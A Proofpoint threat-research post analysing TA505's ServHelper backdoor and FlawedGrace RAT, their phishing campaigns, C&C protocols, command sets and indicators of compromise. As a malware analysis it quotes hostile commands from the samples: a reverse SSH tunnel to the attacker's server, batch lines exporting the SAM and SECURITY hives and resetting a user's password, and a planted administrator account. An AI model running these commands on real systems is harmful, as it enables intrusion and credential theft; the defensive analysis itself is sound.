ServHelper and FlawedGrace - New malware introduced by TA505

January 09, 2019
Dennis Schwarz and Proofpoint Staff

Overview

For much of 2018, we observed threat actors increasingly distributing downloaders, backdoors, information stealers, remote access Trojans (RATs), and more as they abandoned ransomware as their primary payload. In November 2018, TA505, a prolific actor that has been at the forefront of this trend, began distributing  a new backdoor we named “ServHelper”. ServHelper has two variants: one focused on remote desktop functions and a second that primarily functions as a downloader. Additionally we have observed the downloader variant download a malware we call “FlawedGrace.” FlawedGrace is a full-featured RAT that we first observed in November 2017. TA505 appears to be actively targeting banks, retail businesses, and restaurants as they distribute these malware families. This targeting falls in line with other activity we reported earlier in 2018.[1] [2]

Campaign Analysis

November 9 “Tunnel” Campaign

On November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new malware family that we call “ServHelper” based on file names associated with infection. The campaign primarily targeted financial institutions and was attributed to the threat actor TA505. The messages (Figure 1) contained Microsoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware. This campaign used the “tunnel” variant of ServHelper, described in the “Malware Analysis” section.

Figure 1: Example email message from the November 9 “tunnel” campaign

November 15 “Downloader” Campaign

On November 15, 2018, we saw a similar, but larger campaign (tens of thousands of messages) from the same actor. In addition to financial institutions, this campaign also targeted the retail industry. The messages (Figure 2) contained Microsoft “.doc”, “.pub”, or “.wiz” attachments. The documents contained macros that, when enabled, downloaded and executed the ServHelper malware. This campaign used the “downloader” variant of ServHelper with the tunneling functionality removed.

Figure 2: Example email message from the November 15 “downloader” campaign

December 13 “FlawedGrace” Campaign

On December 13, 2018, we observed another large ServHelper “downloader” campaign targeting retail and financial services customers. The messages used a mixture of Microsoft Word attachments with embedded malicious macros, PDF attachments with URLs linking to a fake “Adobe PDF Plugin” webpage linking to the malware (Figure 3), and direct URLs in the email body linking to a ServHelper executable.

Figure 3: Example PDF attachment containing a URL linking to the fake “Adobe PDF Plugin” page

In this campaign, we observed ServHelper download (Figure 4) and execute an additional malware that we call “FlawedGrace.” FlawedGrace is a robust remote access trojan (RAT) that we initially encountered in November 2017, but have rarely observed since.

 

Figure 4: Fiddler screenshot showing ServHelper downloading FlawedGrace

ServHelper Malware Analysis

ServHelper is a new malware family -- best classified as a backdoor -- that we first observed in the wild in November 2018. Its name is based on a filename (ServHelper.dll) that we noted in the November 9 “tunnel” campaign described above. A sample from a later campaign used command and control (C&C) URIs containing “/rest/serv.php” which also reference a “serv” component.

The malware is written in Delphi and at the time of this writing is being actively developed. New commands and functionality are being added to the malware in almost every new campaign so we will not focus on one specific sample for this analysis. Rather, we will discuss the malware family generally; see the “Indicators of Compromise” section below for specific reference samples.

As noted, there are two distinct variants of ServHelper: a “tunnel” variant and a “downloader” variant. The “tunnel” variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to “hijack” legitimate user accounts or their web browser profiles and use them as they see fit. The “downloader” variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader.

Both variants of ServHelper use the same HTTP C&C protocol on port 443 (HTTPS) and, less frequently, port 80 (HTTP). An example of the initial phone home to the C&C server is shown in Figure 5.

Figure 5: Example of ServHelper’s initial phone home

Early versions of the malware used a semi-random URI such as: “/ghuae/huadh.php”. Newer versions have started using more typical URIs such as:

  • /support/form.php
  • /rest/serv.php
  • /sav/s.php

Most of the C&C domains that we have observed have been in the “.pw” top-level domain (TLD) such as:

  • checksolutions[.]pw
  • afgdhjkrm[.]pw
  • pointsoft[.]pw
  • dedoshop[.]pw

However, recently the developer has added support for “.bit” C&C domains; this TLD is associated with the cryptocurrency Namecoin and requires special DNS servers that the malware uses:

  • dedsolutions[.]bit
  • arepos[.]bit

The POST data in these C&C communications contains three URL-encoded parameters: “key”, “sysid”, and “resp”. The “key” parameter is a hardcoded string in the malware that does not appear to be used elsewhere in the code. Examples of observed keys include:

  • Gsiss744@sd
  • asdgdgYss455
  • #567sisGdsa

The “sysid” parameter contains a campaign ID in newer versions of the malware, the Windows version running on the infected machine, system architecture, username, and a random integer. Examples of observed campaign IDs include:

  • clean12
  • chistka12.17
  • noP_19
  • nonRDP
  • no24
  • ny_upd

The “resp” parameter contains responses to commands received from the controller.

An example command sent from the C&C server to the infected machine can be seen in the Fiddler screenshot in Figure 4 above. It contains a command, carrot (“^”) delimiter, and command arguments. We observed the following commands in the malware:

nop

Implements a keep-alive type of functionality. The infected machine responds to the C&C server with a “nop ok” message.

tun (“tunnel” variant only)

Sets up a reverse SSH tunnel connecting the C&C server to the infected system’s RDP port (3389). In earlier versions, a loader component performed the initial setup for this and other commands by:

  • Extracting and dropping an OpenSSH binary from its PE resources
  • Extracting, dropping, and configuring the RDP Wrapper Library software from its PE resources
  • Creating a new user “supportaccount” with a password of “Ghar4f5”
  • Adding this user to the “Remote Desktop Users” and “Administrators” groups

In more recent versions, this functionality of the loader component was integrated into the core ServHelper code, using built-in Windows remote desktop support instead of a third-party software package. This command sets up a reverse SSH tunnel by executing the dropped OpenSSH binary with the following command line arguments:

-N -R <remote port>:localhost:3389 tunnel@<C&C server>

Once configured, ServHelper sends a “tun ok\r\nport:<remote port> tun pid:<SSH process id>” to the C&C server.

slp

Sets a sleep timeout.

fox (“tunnel” variant only)

Copies a Firefox web browser profile from one user to another. Earlier versions used the Windows “xcopy” command. Later versions download a self-extracting RAR file from the C&C server (/cp/cp.exe) and decompress it using the password “123”. One of the files in this archive is a piece of software known as "Runtime's Shadow Copy" and it is used to copy the web browser profiles.

chrome (“tunnel” variant only)

Similar to the “fox” command but for Chrome web browser profiles.

killtun (“tunnel” variant only)

Kills an SSH tunnel process associated with a particular remote port. Once killed, it sends a “killtun ok” message to the C&C server.

tunlist (“tunnel” variant only)

Gets a list of all active SSH tunnels and responds to the C&C server with a message containing “active tun: <remote port>” entries for each active tunnel.

killalltuns (“tunnel” variant only)

Kills all SSH tunnel processes.

shell

Executes a shell command and sends the response to the C&C server.

load

Downloads and runs an executable from a specified URL. Responds to the C&C server with either “load no param ok” or “load param ok” depending if any command-line arguments were passed to the downloaded executable.

socks (“tunnel” variant only)

Similar to the “tun” command, but allows a reverse SSH tunnel to be built between the C&C server to any server/port (as specified by the command argument) through the infected system. Once configured, a “socks ok\r\nport:<remote port> tun pid:<SSH process id>” message is sent to the C&C server.

selfkill

Removes the malware from the infected machine.

loaddll (“downloader” variant only)

A newer command that has only been observed in the “downloader” variant. Similar to the “load” command, but for DLLs.

bk (“tunnel” variant only)

A newer command similar to the “tun” command. “bk” allows the reverse SSH tunnel to be set up using a C&C specified remote host instead of the hardcoded C&C server.

hijack (“tunnel” variant only)

A newer command that appears to hijack a user account with a known password (“123”). It does so by creating and scheduling a task “test” to run a batch file containing the following commands:

  • reg export hklm\sam c:\sam.reg
  • reg export hklm\security c:\sec.reg
  • net user <command argument username> 123

It then schedules a task “test2” to run another batch file containing the following commands:

  • schtasks /delete /tn "test" /F
  • reg import c:\sam.reg
  • reg import c:\sec.reg
  • schtasks /delete /tn "test2" /F

Finally it runs the first scheduled task ands send a “ready! try to login with pass 123” message to the C&C server.

forcekill (“tunnel” variant only)

A newer command that is similar to the “killalltuns” but uses the Windows “taskkill” command.

sethijack (“tunnel” variant only)

A newer command that controls an “alerting” mechanism. A separate program thread monitors user logons. When a legitimate user becomes active and the threat actor is connected to the infected system using the previously created “supportaccount” account, it runs the “chrome” and “fox” commands, copying the legitimate user’s web browser profiles to the “supportaccount” user. It then alerts the threat actor by sending message boxes containing “login detected, begin hijacking” and “profiles hijacked!” messages. These are sent by a “msg.exe” program contained in the “cp.exe” archive discussed in the “fox” command above.

chromeport (“tunnel” variant only)

A newer command that implements the same functionality as the “chrome” command.

During some of the ServHelper “downloader” campaigns, we observed commands (e.g., as shown in Figure 4 above) instructing the malware to download and execute another malware we call “FlawedGrace”.

FlawedGrace Malware Analysis

FlawedGrace is a remote access trojan (RAT) named after debugging artifacts (class names) left in the analyzed sample (see Figure 6).

Figure 6: “Grace” class names shown by IDA Pro

The malware is written in C++. It is a very large program and makes extensive use of object-oriented and multithreaded programming techniques. This makes reverse engineering and debugging the malware both difficult and time consuming. The coding style and techniques suggest that FlawedGrace was not written by the same developer as ServHelper.

We initially observed FlawedGrace in an email campaign as early as November 2017, but until the recent ServHelper campaigns, we had not observed it being actively distributed again. The malware usually contains a debug string including a “version number” and “build date” distinct from the PE compile timestamp, allowing searches of various malware repositories to find additional versions:

  • Unknown version number built at “Aug  7 2017 22:28:47”
  • Version 2.0.7 built at “Oct 18 2017 04:18:39”
  • Version 2.0.8 built at “Oct 26 2017 12:05:44”
  • Version 2.0.9 built at “Nov  4 2017 22:28:10”
  • Version 2.0.10 built at “Nov 20 2017 10:53:33”
  • Version 2.0.11 built at “Dec 16 2017 08:02:46”

Per the malware’s debug strings, significant development took place during the end of 2017. The ServHelper campaigns were distributing version 2.0.10 of the malware.

FlawedGrace creates, encrypts, and stores a configuration file containing the C&C IPs and ports in a “<hex digits>.dat” file (e.g., “C:\ProgramData\21851a60.dat”). The first 16 bytes of the file are an AES initialization vector (IV). The rest of the data is AES-encrypted in CBC mode. In the analyzed sample, the AES key was hardcoded as “c3oeCSIfx0J6UtcV”. Once decrypted, the configuration data is stored as a custom serialization (Figure 7). Early versions of the malware used the class names “GraceParams” and “GraceValue” when interacting with this part of the code, so it is likely that the serialization was designed and developed by the malware developer and not a standard format.

Figure 7: Plaintext configuration file showing C&C IP and port

FlawedGrace uses a complicated binary protocol for its command and control. It can use a configurable port for communications, but all samples we have observed to date have used port 443. Figure 8 shows an example of the first four messages between an infected system and C&C server.

Figure 8: FlawedGrace’s initial C&C communications.

We are still reverse engineering and documenting the protocol, but we can provide an overview of the initial C&C communications below:

Message 1

Initial beacon from infected system. It is a 14-byte binary structure that contains at least the following parts:

  • Offset 0x0: CRC32 hash of remaining data (DWORD)
  • Offset 0x4: magic bytes "GCRG" (DWORD)

Message 2

Key verification message from infected system. We believe that this is used to verify that one of the encryption keys (static key) is the same on both the malware and C&C server. It is a 52-byte binary structure that contains the following analyzed offsets, among other components still under analysis:

  • Offset 0x0: CRC32 hash of remaining data (DWORD)
  • Offset 0x14: MD5 hash of the following pieces (16 bytes)
    • A static key which has always been “static pass” in the samples analyzed
    • The random bytes at offset 0x24 that have been hex encoded and uppercased
  • Offset 0x24: random bytes (16 bytes)

Message 3

Key exchange message from C&C server. This message delivers a second encryption key (dynamic key) used for further data transfers. It is a 42-byte structure that contains the following analyzed offsets, among other components still under analysis:

  • Offset 0x0: CRC32 hash of remaining data (DWORD)
  • Offset 0x1a: dynamic key (16 bytes)

Message 4

An example of data transfer between infected system and C&C server. It starts with a 38-byte binary header that contains the following analyzed offsets, among other components still under analysis:

  • Offset 0x0: CRC32 hash of the next 10 bytes (DWORD)
  • Offset 0xE: AES IV (16 bytes)

Following the header is the data that has been AES-encrypted in CBC mode. The AES key is generated using the “static key” and the “dynamic key” from messages 3 and 4 above. An example of key generation in Python appears in Figure 9.

Figure 9: Example FlawedGrace C&C data transfer encryption key generation in Python

Figure 10 shows an example of the plaintext data transferred in message 4.

Figure 10: Example FlawedGrace C&C message 4 plaintext data

This message contains various system and malware information that has been serialized using the same method as for configuration files. The serialized data is then packaged within additional binary data structures.

While there are other message types with their own formats, the examples here provide initial insight into FlawedGrace’s C&C protocol.

FlawedGrace also uses a series of commands, provided below for reference:

  • target_remove
  • target_update
  • target_reboot
  • target_module_load
  • target_module_load_external
  • target_module_unload
  • target_download
  • target_upload
  • target_rdp
  • target_passwords
  • target_servers
  • target_script
  • destroy_os
  • desktop_stat

Conclusion

Threat actor TA505 is both consistent and prolific. When the group distributes new malware, it may be a blip (like Bart ransomware, which was only distributed for one day in 2016) or like Locky ransomware it may become the dominant strain of malware in the wild. In this case, the group has started distributing two variants on a new backdoor we named ServHelper and a RAT we call FlawedGrace. This also extends the trend that emerged in 2018, in which threat actors increasingly focused on distribution of downloaders, information stealers, RATS, and other malware that can remain resident on victim devices for far longer than destructive, “smash and grab” malware like ransomware. We will continue to observe the distribution of these three malware variants but, at this time, they do not appear to be one-offs, but rather long-term investments by TA505.

References

[1] https://www.proofpoint.com/us/threat-insight/post/ta505-targets-us-retail-industry-personalized-attachments

[2] https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware

 

Indicators of Compromise (IOCs)

IOC

IOC Type

Description

52c72a9de2f6e892f07827add85ad913b0541cd5c8449aadc2722f8eb75e548c

SHA256

November 9 “Tunnel” campaign attachment

hxxp://officemysuppbox[.]com/staterepository

URL

November 9 “Tunnel” campaign payload

1b0859ddbdebcb9d2bb46de00d73aa21bc617614b8123054426556783b211bc8

SHA256

November 9 “Tunnel” campaign ServHelper

hxxps://checksolutions[.]pw/ghuae/huadh.php

URL

November 9 “Tunnel” campaign ServHelper C&C

hxxps://rgoianrdfa[.]pw/ghuae/huadh.php

URL

November 9 “Tunnel” campaign ServHelper C&C

hxxps://arhidsfderm[.]pw/ghuae/huadh.php

URL

November 9 “Tunnel” campaign ServHelper C&C

 

 

 

eb66ebb95a3dcecae64c61f611a9332fbf460d1b8039d3ab7e4f220104a4bec4

SHA256

November 15 “Downloader” campaign attachment

hxxp://offficebox[.]com/host32

URL

November 15 “Downloader” campaign payload

3cd7e0a8321259e8446b2a9da775aae674715c74ff4923cfc8ec5102f380d41a

SHA256

November 15 “Downloader” campaign ServHelper

 

 

 

f4b9219f329803dd45afd5646351de456e608dd946830c961ec66c6c25e52cac

SHA256

December 13 “FlawedGrace” campaign attachment

hxxp://office365onlinehome[.]com/host32

 

URL

December 13 “FlawedGrace” campaign payload

d56429d6d0222022fe8f4cb35a28cd4fb83f87b666a186eb54d9785f01bb4b58

SHA256

December 13 “FlawedGrace” campaign ServHelper

hxxps://afgdhjkrm[.]pw/aggdst/Hasrt.php

URL

December 13 “FlawedGrace”  campaign ServHelper C&C

efcee275d23b6e71589452b1cb3095ff92b10ab68cd07957b2ad6be587647b74

SHA256

December 13 “FlawedGrace” campaign FlawedGrace

46.161.27[.]241:443

IP:Port

December 13 “FlawedGrace” campaign FlawedGrace C&C

 

 

 

9fccd107bd0aee3a2f39ad76a49758309c95545d8154b808eec24d2b51dc4579

SHA256

“sethijack” command ServHelper

hxxp://dedsolutions[.]bit/sav/s.php

URL

“sethijack” command ServHelper C&C

hxxp://dedoshop[.]pw/sav/s.php

URL

“sethijack” command ServHelper C&C

hxxp://asgaage[.]pw/sav/s.php

URL

“sethijack” command ServHelper C&C

hxxp://sghee[.]pw/sav/s.php

URL

“sethijack” command ServHelper C&C

a9492312f1258567c3633ed077990fe053776cd576aa60ac7589c6bd7829d549

SHA256

“loaddll” command ServHelper

hxxps://vesecase[.]com/support/form.php

URL

“loaddll” command ServHelper C&C

 

ET and ETPRO Suricata/Snort Signatures

2833522          ETPRO TROJAN Observed Malicious SSL Cert (HuadhServHelper RAT CnC)

2833552          ETPRO TROJAN HuadhServHelper RAT CnC Domain Observed in SNI

2833881          ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)

2833985          ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)

2834074          ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)

2834233          ETPRO TROJAN ServHelper CnC Inital Checkin

2828489          ETPRO TROJAN FlawedGrace CnC Activity